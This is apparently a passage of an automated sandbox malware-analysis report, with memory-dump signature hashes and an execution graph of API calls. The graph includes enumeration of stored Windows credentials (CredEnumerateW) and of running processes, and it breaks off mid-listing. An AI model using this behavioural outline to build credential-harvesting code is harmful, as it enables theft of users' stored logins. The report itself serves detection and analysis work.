                                                                                            • Opcode ID: 79310bfefc265a0f5c38578c1164f07842a3c7c7765e2705e614b78bae90a928
                                                                                            • Instruction ID: a89bc7ad66bcc87eca3b839daead173812b9d76ce45d1354b15163c429f95883
                                                                                            • Opcode Fuzzy Hash: 79310bfefc265a0f5c38578c1164f07842a3c7c7765e2705e614b78bae90a928
                                                                                            • Instruction Fuzzy Hash: 80718BF2F042868FE7248A68950867ABBE69FC6710F14C47AD5098B755EB32CE45C3D1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$S;$S;
                                                                                            • API String ID: 0-270107487
                                                                                            • Opcode ID: 68f289a4c5d1902e6a9f9f9d8e434ab396a0eb437d12730ea4a62c7740751d2a
                                                                                            • Instruction ID: 393a1e9d1c28f7b54e71bf6427d3c9dfce5b7038e9592d5426ec6a1ae027e5c2
                                                                                            • Opcode Fuzzy Hash: 68f289a4c5d1902e6a9f9f9d8e434ab396a0eb437d12730ea4a62c7740751d2a
                                                                                            • Instruction Fuzzy Hash: 50711AB1B0420ACFD7249A68D5086AABBE6AFC5310F24C47BD509EB359EB31C945C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                            • API String ID: 0-3859475322
                                                                                            • Opcode ID: a6eab20655f023a200f73e704538a205d1883d7aef96ca80e20f0eeef0d23559
                                                                                            • Instruction ID: 503cdd93756fffabe64db6a81a290fade13043be19e28db57cf4462f9aba83bf
                                                                                            • Opcode Fuzzy Hash: a6eab20655f023a200f73e704538a205d1883d7aef96ca80e20f0eeef0d23559
                                                                                            • Instruction Fuzzy Hash: F2716CF1B043069FEB244B6988087ABBBE6BFC6310F15C46AD5098B759DB32C845C3A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-2125118731
                                                                                            • Opcode ID: dc4ca68e54eec3ca2eab16e33e8eb52a6a0ac4a00fe46c2a6c3f31149f95b4ec
                                                                                            • Instruction ID: 9c98c0182bd665875c6005d9e24e080c265d5d2fc013318d29f88afc62329891
                                                                                            • Opcode Fuzzy Hash: dc4ca68e54eec3ca2eab16e33e8eb52a6a0ac4a00fe46c2a6c3f31149f95b4ec
                                                                                            • Instruction Fuzzy Hash: 463167F171031A6BF72419298C04B3A76DA9BC0F04F20883AA549CFB99DE26DC4583A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-2125118731
                                                                                            • Opcode ID: 9400e33e04981182c6f6dce7d84c35e2286f56c5393e58ab61d7ac0a44160d91
                                                                                            • Instruction ID: ddba44635281773b489885dabc1b996a1d2cb0266ce67393e090b98e30ff08e2
                                                                                            • Opcode Fuzzy Hash: 9400e33e04981182c6f6dce7d84c35e2286f56c5393e58ab61d7ac0a44160d91
                                                                                            • Instruction Fuzzy Hash: 482149F231030A5BF73C1929990AF277BDAABC0711F24C92AA64DCF389DD75E8418361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                            • API String ID: 0-2049395529
                                                                                            • Opcode ID: 312d358366aecc0baaa5f7a656d199d20a42cff6ea90acde56f904b4a8f3a81a
                                                                                            • Instruction ID: 84848985ae13a14a3c92e7c1d499313694149979b490b8d9c6ca9db339f580b9
                                                                                            • Opcode Fuzzy Hash: 312d358366aecc0baaa5f7a656d199d20a42cff6ea90acde56f904b4a8f3a81a
                                                                                            • Instruction Fuzzy Hash: 1801F2A1A0D3CA8FE72B123818295A66FB21FC391032944DBC085CF35BCD198D49C3A7
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.1%
                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                            Signature Coverage:2.8%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:60
                                                                                            execution_graph 40511 441819 40514 430737 40511->40514 40513 441825 40515 430756 40514->40515 40516 43076d 40514->40516 40517 430774 40515->40517 40518 43075f 40515->40518 40516->40513 40529 43034a memcpy 40517->40529 40528 4169a7 11 API calls 40518->40528 40521 4307ce 40522 430819 memset 40521->40522 40530 415b2c 11 API calls 40521->40530 40522->40516 40523 43077e 40523->40516 40523->40521 40526 4307fa 40523->40526 40525 4307e9 40525->40516 40525->40522 40531 4169a7 11 API calls 40526->40531 40528->40516 40529->40523 40530->40525 40531->40516 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 44681e GetStartupInfoW 38303->38304 38305 446810 38303->38305 38307 446866 GetModuleHandleA 38304->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38305 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38340 412863 CoInitialize 38336->38340 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38340->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38465 38386 40ac5c 38389 40ad4b 38386->38389 38390 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38386->38390 38392 40ace7 ??3@YAXPAX 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 7 API calls 38386->38469 38470 4099f4 38386->38470 38389->38397 38478 40a9ce 38389->38478 38390->38386 38392->38386 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38484 40dce0 38402->38484 38404 40dd3a GetModuleHandleW 38489 40dba7 38404->38489 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38561 40dae1 38409->38561 38575 402f3a 38412->38575 38414 412766 38414->38333 38414->38340 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38609 4125f8 7 API calls 38416->38609 38418->38414 38578 411ac5 38418->38578 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 ??3@YAXPAX 38434->38436 38437 40b1ab ??3@YAXPAX ??3@YAXPAX 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a ??3@YAXPAX 38466->38468 38467->38398 38468->38467 38469->38386 38471 409a41 38470->38471 38472 4099fb malloc 38470->38472 38471->38386 38474 409a37 38472->38474 38475 409a1c 38472->38475 38474->38386 38476 409a30 ??3@YAXPAX 38475->38476 38477 409a20 memcpy 38475->38477 38476->38474 38477->38476 38479 40a9e7 38478->38479 38480 40a9dc ??3@YAXPAX 38478->38480 38482 4099f4 3 API calls 38479->38482 38481 40a9f2 38480->38481 38483 40a8d0 7 API calls 38481->38483 38482->38481 38483->38397 38508 409bca GetModuleFileNameW 38484->38508 38486 40dce6 wcsrchr 38487 40dcf5 38486->38487 38488 40dcf9 wcscat 38486->38488 38487->38488 38488->38404 38509 44db70 38489->38509 38493 40dbfd 38512 4447d9 38493->38512 38496 40dc34 wcscpy wcscpy 38538 40d6f5 38496->38538 38497 40dc1f wcscpy 38497->38496 38500 40d6f5 3 API calls 38501 40dc73 38500->38501 38502 40d6f5 3 API calls 38501->38502 38503 40dc89 38502->38503 38504 40d6f5 3 API calls 38503->38504 38505 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38504->38505 38544 40da80 38505->38544 38508->38486 38510 40dbb4 memset memset 38509->38510 38511 409bca GetModuleFileNameW 38510->38511 38511->38493 38514 4447f4 38512->38514 38513 40dc1b 38513->38496 38513->38497 38514->38513 38515 444807 ??2@YAPAXI 38514->38515 38516 44481f 38515->38516 38517 444873 _snwprintf 38516->38517 38518 4448ab wcscpy 38516->38518 38551 44474a 8 API calls 38517->38551 38519 4448bb 38518->38519 38552 44474a 8 API calls 38519->38552 38522 4448a7 38522->38518 38522->38519 38523 4448cd 38553 44474a 8 API calls 38523->38553 38525 4448e2 38554 44474a 8 API calls 38525->38554 38527 4448f7 38555 44474a 8 API calls 38527->38555 38529 44490c 38556 44474a 8 API calls 38529->38556 38531 444921 38557 44474a 8 API calls 38531->38557 38533 444936 38558 44474a 8 API calls 38533->38558 38535 44494b 38559 44474a 8 API calls 38535->38559 38537 444960 ??3@YAXPAX 38537->38513 38539 44db70 38538->38539 38540 40d702 memset GetPrivateProfileStringW 38539->38540 38541 40d752 38540->38541 38542 40d75c WritePrivateProfileStringW 38540->38542 38541->38542 38543 40d758 38541->38543 38542->38543 38543->38500 38545 44db70 38544->38545 38546 40da8d memset 38545->38546 38547 40daac LoadStringW 38546->38547 38548 40dac6 38547->38548 38548->38547 38550 40dade 38548->38550 38560 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38548->38560 38550->38333 38551->38522 38552->38523 38553->38525 38554->38527 38555->38529 38556->38531 38557->38533 38558->38535 38559->38537 38560->38548 38571 409b98 GetFileAttributesW 38561->38571 38563 40daea 38564 40db63 38563->38564 38565 40daef wcscpy wcscpy GetPrivateProfileIntW 38563->38565 38564->38335 38572 40d65d GetPrivateProfileStringW 38565->38572 38567 40db3e 38573 40d65d GetPrivateProfileStringW 38567->38573 38569 40db4f 38574 40d65d GetPrivateProfileStringW 38569->38574 38571->38563 38572->38567 38573->38569 38574->38564 38610 40eaff 38575->38610 38579 411ae2 memset 38578->38579 38580 411b8f 38578->38580 38650 409bca GetModuleFileNameW 38579->38650 38592 411a8b 38580->38592 38582 411b0a wcsrchr 38583 411b22 wcscat 38582->38583 38584 411b1f 38582->38584 38651 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38583->38651 38584->38583 38586 411b67 38652 402afb 38586->38652 38590 411b7f 38708 40ea13 SendMessageW memset SendMessageW 38590->38708 38593 402afb 27 API calls 38592->38593 38594 411ac0 38593->38594 38595 4110dc 38594->38595 38596 41113e 38595->38596 38601 4110f0 38595->38601 38733 40969c LoadCursorW SetCursor 38596->38733 38598 411143 38734 444a54 38598->38734 38737 4032b4 38598->38737 38599 4110f7 _wcsicmp 38599->38601 38600 411157 38602 40ada2 _wcsicmp 38600->38602 38601->38596 38601->38599 38755 410c46 10 API calls 38601->38755 38605 411167 38602->38605 38603 4111af 38605->38603 38606 4111a6 qsort 38605->38606 38606->38603 38609->38416 38611 40eb10 38610->38611 38623 40e8e0 38611->38623 38614 40eb6c memcpy memcpy 38618 40ebb7 38614->38618 38615 40ebf2 ??2@YAPAXI ??2@YAPAXI 38617 40ec2e ??2@YAPAXI 38615->38617 38620 40ec65 38615->38620 38616 40d134 16 API calls 38616->38618 38617->38620 38618->38614 38618->38615 38618->38616 38620->38620 38633 40ea7f 38620->38633 38622 402f49 38622->38416 38624 40e8f2 38623->38624 38625 40e8eb ??3@YAXPAX 38623->38625 38626 40e900 38624->38626 38627 40e8f9 ??3@YAXPAX 38624->38627 38625->38624 38628 40e911 38626->38628 38629 40e90a ??3@YAXPAX 38626->38629 38627->38626 38630 40e931 ??2@YAPAXI ??2@YAPAXI 38628->38630 38631 40e921 ??3@YAXPAX 38628->38631 38632 40e92a ??3@YAXPAX 38628->38632 38629->38628 38630->38614 38631->38632 38632->38630 38634 40aa04 ??3@YAXPAX 38633->38634 38635 40ea88 38634->38635 38636 40aa04 ??3@YAXPAX 38635->38636 38637 40ea90 38636->38637 38638 40aa04 ??3@YAXPAX 38637->38638 38639 40ea98 38638->38639 38640 40aa04 ??3@YAXPAX 38639->38640 38641 40eaa0 38640->38641 38642 40a9ce 4 API calls 38641->38642 38643 40eab3 38642->38643 38644 40a9ce 4 API calls 38643->38644 38645 40eabd 38644->38645 38646 40a9ce 4 API calls 38645->38646 38647 40eac7 38646->38647 38648 40a9ce 4 API calls 38647->38648 38649 40ead1 38648->38649 38649->38622 38650->38582 38651->38586 38709 40b2cc 38652->38709 38654 402b0a 38655 40b2cc 27 API calls 38654->38655 38656 402b23 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 402b3a 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 402b54 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 402b6b 38661->38662 38663 40b2cc 27 API calls 38662->38663 38664 402b82 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 402b99 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402bb0 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402bc7 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402bde 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402bf5 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402c0c 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402c23 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402c3a 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402c51 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402c68 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c7f 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c99 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402cb3 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402cd5 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402cf0 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402d0b 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402d26 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402d3e 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402d59 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402d78 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d93 38705->38706 38707 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38706->38707 38707->38590 38708->38580 38712 40b58d 38709->38712 38711 40b2d1 38711->38654 38713 40b5a4 GetModuleHandleW FindResourceW 38712->38713 38714 40b62e 38712->38714 38715 40b5c2 LoadResource 38713->38715 38717 40b5e7 38713->38717 38714->38711 38716 40b5d0 SizeofResource LockResource 38715->38716 38715->38717 38716->38717 38717->38714 38725 40afcf 38717->38725 38719 40b608 memcpy 38728 40b4d3 memcpy 38719->38728 38721 40b61e 38729 40b3c1 18 API calls 38721->38729 38723 40b626 38730 40b04b 38723->38730 38726 40b04b ??3@YAXPAX 38725->38726 38727 40afd7 ??2@YAPAXI 38726->38727 38727->38719 38728->38721 38729->38723 38731 40b051 ??3@YAXPAX 38730->38731 38732 40b05f 38730->38732 38731->38732 38732->38714 38733->38598 38735 444a64 FreeLibrary 38734->38735 38736 444a83 38734->38736 38735->38736 38736->38600 38738 4032c4 38737->38738 38739 40b633 ??3@YAXPAX 38738->38739 38740 403316 38739->38740 38756 44553b 38740->38756 38744 403480 38952 40368c 15 API calls 38744->38952 38746 403489 38747 40b633 ??3@YAXPAX 38746->38747 38748 403495 38747->38748 38748->38600 38749 4033a9 memset memcpy 38750 4033ec wcscmp 38749->38750 38751 40333c 38749->38751 38750->38751 38751->38744 38751->38749 38751->38750 38950 4028e7 11 API calls 38751->38950 38951 40f508 6 API calls 38751->38951 38753 403421 _wcsicmp 38753->38751 38755->38601 38757 445548 38756->38757 38758 445599 38757->38758 38953 40c768 38757->38953 38759 4455a8 memset 38758->38759 38900 4457f2 38758->38900 39036 403988 38759->39036 38766 445854 38767 4458aa 38766->38767 39161 403c9c memset memset memset memset memset 38766->39161 38769 44594a 38767->38769 38770 4458bb memset memset 38767->38770 38768 445672 39047 403fbe memset memset memset memset memset 38768->39047 38772 4459ed 38769->38772 38773 44595e memset memset 38769->38773 38775 414c2e 16 API calls 38770->38775 38777 445a00 memset memset 38772->38777 38778 445b22 38772->38778 38779 414c2e 16 API calls 38773->38779 38774 4455e5 38774->38768 38791 44560f 38774->38791 38780 4458f9 38775->38780 39184 414c2e 38777->39184 38783 445bca 38778->38783 38784 445b38 memset memset memset 38778->38784 38789 44599c 38779->38789 38790 40b2cc 27 API calls 38780->38790 38800 445c8b memset memset 38783->38800 38850 445cf0 38783->38850 38795 445bd4 38784->38795 38796 445b98 38784->38796 38785 445849 39248 40b1ab ??3@YAXPAX ??3@YAXPAX 38785->39248 38799 40b2cc 27 API calls 38789->38799 38801 445909 38790->38801 38792 4087b3 338 API calls 38791->38792 38811 445621 38792->38811 38794 44589f 39249 40b1ab ??3@YAXPAX ??3@YAXPAX 38794->39249 38808 414c2e 16 API calls 38795->38808 38796->38795 38804 445ba2 38796->38804 38813 4459ac 38799->38813 38802 414c2e 16 API calls 38800->38802 38810 409d1f 6 API calls 38801->38810 38814 445cc9 38802->38814 39321 4099c6 wcslen 38804->39321 38805 4456b2 39236 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->39236 38807 40b2cc 27 API calls 38817 445a4f 38807->38817 38819 445be2 38808->38819 38809 403335 38949 4452e5 45 API calls 38809->38949 38822 445919 38810->38822 39234 4454bf 20 API calls 38811->39234 38812 445823 38812->38785 38830 4087b3 338 API calls 38812->38830 38823 409d1f 6 API calls 38813->38823 38824 409d1f 6 API calls 38814->38824 38815 445879 38815->38794 38834 4087b3 338 API calls 38815->38834 39199 409d1f wcslen wcslen 38817->39199 38828 40b2cc 27 API calls 38819->38828 38820 445d3d 38848 40b2cc 27 API calls 38820->38848 38821 445d88 memset memset memset 38831 414c2e 16 API calls 38821->38831 39250 409b98 GetFileAttributesW 38822->39250 38832 4459bc 38823->38832 38833 445ce1 38824->38833 38825 445bb3 39324 445403 memset 38825->39324 38826 445680 38826->38805 39070 4087b3 memset 38826->39070 38837 445bf3 38828->38837 38830->38812 38840 445dde 38831->38840 39317 409b98 GetFileAttributesW 38832->39317 39341 409b98 GetFileAttributesW 38833->39341 38834->38815 38847 409d1f 6 API calls 38837->38847 38838 445928 38838->38769 39251 40b6ef 38838->39251 38849 40b2cc 27 API calls 38840->38849 38842 4459cb 38842->38772 38859 40b6ef 252 API calls 38842->38859 38846 40b2cc 27 API calls 38852 445a94 38846->38852 38854 445c07 38847->38854 38855 445d54 _wcsicmp 38848->38855 38858 445def 38849->38858 38850->38809 38850->38820 38850->38821 38851 445389 258 API calls 38851->38783 39204 40ae18 38852->39204 38853 44566d 38853->38900 39121 413d4c 38853->39121 38862 445389 258 API calls 38854->38862 38863 445d71 38855->38863 38926 445d67 38855->38926 38857 445665 39235 40b1ab ??3@YAXPAX ??3@YAXPAX 38857->39235 38864 409d1f 6 API calls 38858->38864 38859->38772 38867 445c17 38862->38867 39342 445093 23 API calls 38863->39342 38870 445e03 38864->38870 38866 4456d8 38872 40b2cc 27 API calls 38866->38872 38873 40b2cc 27 API calls 38867->38873 38869 44563c 38869->38857 38875 4087b3 338 API calls 38869->38875 39343 409b98 GetFileAttributesW 38870->39343 38871 40b6ef 252 API calls 38871->38809 38877 4456e2 38872->38877 38878 445c23 38873->38878 38874 445d83 38874->38809 38875->38869 39237 413fa6 _wcsicmp _wcsicmp 38877->39237 38882 409d1f 6 API calls 38878->38882 38880 445e12 38883 445e6b 38880->38883 38887 40b2cc 27 API calls 38880->38887 38885 445c37 38882->38885 39345 445093 23 API calls 38883->39345 38884 4456eb 38890 4456fd memset memset memset memset 38884->38890 38891 4457ea 38884->38891 38892 445389 258 API calls 38885->38892 38886 445b17 39318 40aebe 38886->39318 38894 445e33 38887->38894 39238 409c70 wcscpy wcsrchr 38890->39238 39241 413d29 38891->39241 38898 445c47 38892->38898 38899 409d1f 6 API calls 38894->38899 38896 445e7e 38901 445f67 38896->38901 38904 40b2cc 27 API calls 38898->38904 38905 445e47 38899->38905 38900->38766 39138 403e2d memset memset memset memset memset 38900->39138 38906 40b2cc 27 API calls 38901->38906 38902 445ab2 memset 38907 40b2cc 27 API calls 38902->38907 38909 445c53 38904->38909 39344 409b98 GetFileAttributesW 38905->39344 38911 445f73 38906->38911 38912 445aa1 38907->38912 38908 409c70 2 API calls 38913 44577e 38908->38913 38914 409d1f 6 API calls 38909->38914 38916 409d1f 6 API calls 38911->38916 38912->38886 38912->38902 38917 409d1f 6 API calls 38912->38917 39211 40add4 38912->39211 39216 445389 38912->39216 39225 40ae51 38912->39225 38918 409c70 2 API calls 38913->38918 38919 445c67 38914->38919 38915 445e56 38915->38883 38923 445e83 memset 38915->38923 38920 445f87 38916->38920 38917->38912 38921 44578d 38918->38921 38922 445389 258 API calls 38919->38922 39348 409b98 GetFileAttributesW 38920->39348 38921->38891 38928 40b2cc 27 API calls 38921->38928 38922->38783 38927 40b2cc 27 API calls 38923->38927 38926->38809 38926->38871 38929 445eab 38927->38929 38930 4457a8 38928->38930 38931 409d1f 6 API calls 38929->38931 38932 409d1f 6 API calls 38930->38932 38934 445ebf 38931->38934 38933 4457b8 38932->38933 39240 409b98 GetFileAttributesW 38933->39240 38936 40ae18 9 API calls 38934->38936 38940 445ef5 38936->38940 38937 4457c7 38937->38891 38939 4087b3 338 API calls 38937->38939 38938 40ae51 9 API calls 38938->38940 38939->38891 38940->38938 38941 445f5c 38940->38941 38943 40add4 2 API calls 38940->38943 38944 40b2cc 27 API calls 38940->38944 38945 409d1f 6 API calls 38940->38945 38947 445f3a 38940->38947 39346 409b98 GetFileAttributesW 38940->39346 38942 40aebe FindClose 38941->38942 38942->38901 38943->38940 38944->38940 38945->38940 39347 445093 23 API calls 38947->39347 38949->38751 38950->38753 38951->38751 38952->38746 38954 40c775 38953->38954 39349 40b1ab ??3@YAXPAX ??3@YAXPAX 38954->39349 38956 40c788 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39350 38958 40c790 39351 40b1ab ??3@YAXPAX ??3@YAXPAX 38958->39351 38960 40c798 38961 40aa04 ??3@YAXPAX 38960->38961 38962 40c7a0 38961->38962 39352 40c274 memset 38962->39352 38967 40a8ab 9 API calls 38968 40c7c3 38967->38968 38969 40a8ab 9 API calls 38968->38969 38970 40c7d0 38969->38970 39381 40c3c3 38970->39381 38974 40c877 38983 40bdb0 38974->38983 38975 40c86c 39423 4053fe 39 API calls 38975->39423 38981 40c7e5 38981->38974 38981->38975 38982 40c634 49 API calls 38981->38982 39406 40a706 38981->39406 38982->38981 39616 404363 38983->39616 38986 40bf5d 39636 40440c 38986->39636 38988 40bdee 38988->38986 38991 40b2cc 27 API calls 38988->38991 38989 40bddf CredEnumerateW 38989->38988 38992 40be02 wcslen 38991->38992 38992->38986 38999 40be1e 38992->38999 38993 40be26 _wcsncoll 38993->38999 38996 40be7d memset 38997 40bea7 memcpy 38996->38997 38996->38999 38998 40bf11 wcschr 38997->38998 38997->38999 38998->38999 38999->38986 38999->38993 38999->38996 38999->38997 38999->38998 39000 40b2cc 27 API calls 38999->39000 39002 40bf43 LocalFree 38999->39002 39639 40bd5d 28 API calls 38999->39639 39640 404423 38999->39640 39001 40bef6 _wcsnicmp 39000->39001 39001->38998 39001->38999 39002->38999 39003 4135f7 39653 4135e0 39003->39653 39006 40b2cc 27 API calls 39007 41360d 39006->39007 39037 40399d 39036->39037 39682 403a16 39037->39682 39040 403a12 wcsrchr 39040->38774 39043 4039a3 39044 4039f4 39043->39044 39046 403a09 39043->39046 39693 40a02c CreateFileW 39043->39693 39045 4099c6 2 API calls 39044->39045 39044->39046 39045->39046 39696 40b1ab ??3@YAXPAX ??3@YAXPAX 39046->39696 39048 414c2e 16 API calls 39047->39048 39049 404048 39048->39049 39050 414c2e 16 API calls 39049->39050 39051 404056 39050->39051 39052 409d1f 6 API calls 39051->39052 39053 404073 39052->39053 39054 409d1f 6 API calls 39053->39054 39055 40408e 39054->39055 39056 409d1f 6 API calls 39055->39056 39057 4040a6 39056->39057 39058 403af5 20 API calls 39057->39058 39059 4040ba 39058->39059 39060 403af5 20 API calls 39059->39060 39061 4040cb 39060->39061 39723 40414f memset 39061->39723 39063 404140 39737 40b1ab ??3@YAXPAX ??3@YAXPAX 39063->39737 39064 4040ec memset 39068 4040e0 39064->39068 39066 404148 39066->38826 39067 4099c6 2 API calls 39067->39068 39068->39063 39068->39064 39068->39067 39069 40a8ab 9 API calls 39068->39069 39069->39068 39750 40a6e6 WideCharToMultiByte 39070->39750 39072 4087ed 39751 4095d9 memset 39072->39751 39122 40b633 ??3@YAXPAX 39121->39122 39123 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39122->39123 39124 413f00 Process32NextW 39123->39124 39125 413da5 OpenProcess 39124->39125 39126 413f17 CloseHandle 39124->39126 39127 413eb0 39125->39127 39128 413df3 memset 39125->39128 39126->38866 39127->39124 39130 413ebf ??3@YAXPAX 39127->39130 39131 4099f4 3 API calls 39127->39131 39989 413f27 39128->39989 39130->39127 39131->39127 39133 413e37 GetModuleHandleW 39134 413e46 GetProcAddress 39133->39134 39135 413e1f 